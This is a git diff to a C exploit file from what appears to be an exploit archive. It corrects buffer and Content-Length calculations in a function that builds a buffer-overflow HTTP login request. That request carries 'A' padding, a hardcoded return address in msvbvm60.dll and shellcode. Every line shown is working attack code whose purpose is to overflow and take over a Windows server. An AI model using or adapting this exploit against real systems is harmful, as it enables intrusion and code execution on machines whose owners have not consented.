diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c index 6daac8996..c3cdac3b2 100644 --- a/exploits/windows/dos/42341.c +++ b/exploits/windows/dos/42341.c @@ -62,9 +62,10 @@ void EvilRequest() { "Content-Length: "; char request_two[] = "\r\n\r\nusername="; - char *padding = malloc(780); - memset(padding, 0x41, 780); - memset(padding + 778, 0x00, 2); + int initial_buffer_size = 780; + char *padding = malloc(initial_buffer_size); + memset(padding, 0x41, initial_buffer_size); + memset(padding + initial_buffer_size - 1, 0x00, 1); unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll unsigned char shellcode[] = @@ -96,10 +97,10 @@ void EvilRequest() { char request_three[] = "&password=A"; - int buffer_length = strlen(request_one) + 780 + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three); - int content_length = 9 + 780 + strlen(retn) + strlen(shellcode) + strlen(request_three); + int content_length = 9 + strlen(padding) + strlen(retn) + strlen(shellcode) + strlen(request_three); char *content_length_string = malloc(15); sprintf(content_length_string, "%d", content_length); + int buffer_length = strlen(request_one) + strlen(content_length_string) + initial_buffer_size + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three); char *buffer = malloc(buffer_length); memset(buffer, 0x00, buffer_length);